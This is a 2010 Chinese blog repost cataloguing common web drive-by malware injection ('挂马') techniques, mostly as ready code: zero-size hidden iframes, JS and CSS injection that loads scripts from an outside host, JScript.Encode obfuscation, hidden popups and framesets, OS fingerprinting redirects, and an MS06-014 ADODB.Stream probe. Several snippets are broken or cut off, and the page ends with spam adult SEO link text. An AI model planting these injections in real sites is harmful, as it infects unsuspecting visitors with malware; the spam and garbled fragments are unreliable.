• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉】常用的掛馬方式和系統判斷等代碼

            一:框架掛馬
            <iframe src=地址 width=0 height=0></iframe>

            二:js文件掛馬
            首先將以下代碼
            document.write("<iframe width=0 height=0 src=地址></iframe>");
            保存為xxx.js,
            則JS掛馬代碼為
            <script language=javascript src=xxx.js></script>

            三:js變形加密
            <SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
            muma.txt可改成任意后綴

            四:body掛馬
            <body onload="window.location=地址;"></body>

            五:隱蔽掛馬
            top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src=">;

            六:css中掛馬
            body {
            background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

            七:JAJA掛馬
            <SCRIPT language=javascript>
            window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
            </script>

            八:圖片偽裝
            <html>
            <iframe src="網馬地址" height=0 width=0></iframe>
            <img src="圖片地址"></center>
            </html>

            九:偽裝調用:
            <frameset rows="444,0" cols="*">
            <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
            <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
            </frameset>

            十:高級欺騙
            <a href="
            <SCRIPT Language="JavaScript">
            function www_163_com ()
            {
            var url="網馬地址";
            open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
            }
            </SCRIPT>

            十一:判斷系統代碼

            <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
            <HTML><HEAD><TITLE>404</TITLE>
            <META http-equiv=Content-Type content="text/html; charset=windows-1252">
            <META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
            <BODY>
            <SCRIPT language=javascript>
            window.status="";
            if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
            window.location.href="tk.htm";
            else
            window.location.href="upx06014.htm";
            </SCRIPT>
            </BODY></HTML>

            十二:判斷是否有ms06014代碼

            <script language=VBScript>
            on error resume next
            set server = document.createElement("object")
            server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
            set File = server.createobject(Adodb.Stream,"")
            if Not Err.Number = 0 then
            err.clear
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            else
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            end if
            </script>

            十三:智能讀取js的代碼demo

            //讀娶src的對象
            var v = document.getElementById("advjs");
            //讀娶src的參數
            var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

            document.write("<iframe src="document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
            document.writeln("<HTML><HEAD>");
            document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
            document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
            document.writeln("<BODY> ");
            document.writeln("<DIV style="CURSOR: url(
            document.writeln("style="CURSOR: url(

            //分析src的參數函數
            function getUrlParameterAdv(asName,lsURL){

            loU = lsURL.split("?");
            if (loU.length>1){

            var loallPm = loU[1].split("&");

            for (var i=0; i<loallPm.length; i++){
            var loPm = loallPm[i].split("=");
            if (loPm[0]==asName){
            if (loPm.length>1){
            return loPm[1];
            }else{
            return "";
            }
            }
            }
            }
            return null;
            }

            posted on 2010-05-15 07:49 小默 閱讀(266) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導航

            統計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            国产精品美女久久福利网站| 欧美午夜A∨大片久久| 一本色综合网久久| 91精品国产高清久久久久久io| 99精品久久久久中文字幕| 久久久久国产精品麻豆AR影院| 久久综合亚洲鲁鲁五月天| 2021久久国自产拍精品| 精品久久久一二三区| 久久se精品一区精品二区| 国产精品美女久久福利网站| av国内精品久久久久影院| 久久无码一区二区三区少妇| 久久免费视频网站| 嫩草伊人久久精品少妇AV| 天堂无码久久综合东京热| 久久精品国产91久久综合麻豆自制| 青草久久久国产线免观| 日本久久久精品中文字幕| 久久精品国产99久久无毒不卡| 国产精品成人久久久| 亚洲精品97久久中文字幕无码| 国产视频久久| 国产精品gz久久久| 国产精品青草久久久久福利99| 久久精品无码午夜福利理论片| 亚洲午夜久久久久久噜噜噜| 午夜精品久久久内射近拍高清| 精品水蜜桃久久久久久久| 狠狠久久综合伊人不卡| 国产精品成人久久久久久久| 亚洲成色999久久网站| 91久久精品无码一区二区毛片| 精品久久久久久无码专区不卡| 久久久久久久久久久久中文字幕 | 亚洲精品国产美女久久久| 精品久久人人爽天天玩人人妻| 国内精品久久久久久久涩爱 | 久久精品国产亚洲精品2020| 亚洲人成网亚洲欧洲无码久久| 久久午夜无码鲁丝片秋霞|